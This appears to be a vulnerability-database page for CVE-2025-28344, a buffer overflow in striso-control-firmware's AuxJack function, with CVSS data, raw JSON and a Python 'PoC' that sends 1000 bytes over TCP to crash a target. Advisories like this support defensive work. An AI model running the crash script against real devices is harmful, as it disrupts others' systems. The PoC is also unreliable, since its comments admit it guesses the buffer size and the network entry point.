Security Vulnerability Report
中文
CVE-2025-28344 CVSS 7.5 HIGH

CVE-2025-28344

Published: 2026-05-13 16:16:35
Last Modified: 2026-05-14 13:16:17

Description

striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function AuxJack.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

striso-control-firmware 54c9722

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ PoC for CVE-2025-28344 (Buffer Overflow in AuxJack function) This script sends a malicious payload to trigger the buffer overflow. Note: The target IP and port need to be configured based on the actual environment. """ import socket import sys def send_exploit(target_ip, target_port): # Construct a payload larger than the expected buffer size # Assuming the buffer is small, we send 1000 bytes of 'A' payload = b'A' * 1000 try: print(f"[+] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) print(f"[+] Sending payload ({len(payload)} bytes)...") s.send(payload) print("[+] Payload sent. Check if the device crashed.") s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 poc.py <target_ip> <target_port>") sys.exit(1) TARGET_IP = sys.argv[1] TARGET_PORT = int(sys.argv[2]) send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-28344", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:35.087", "lastModified": "2026-05-14T13:16:16.617", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function AuxJack."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/striso/striso-control-firmware/issues/6", "source": "[email protected]"}, {"url": "https://github.com/striso/striso-control-firmware/issues/6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}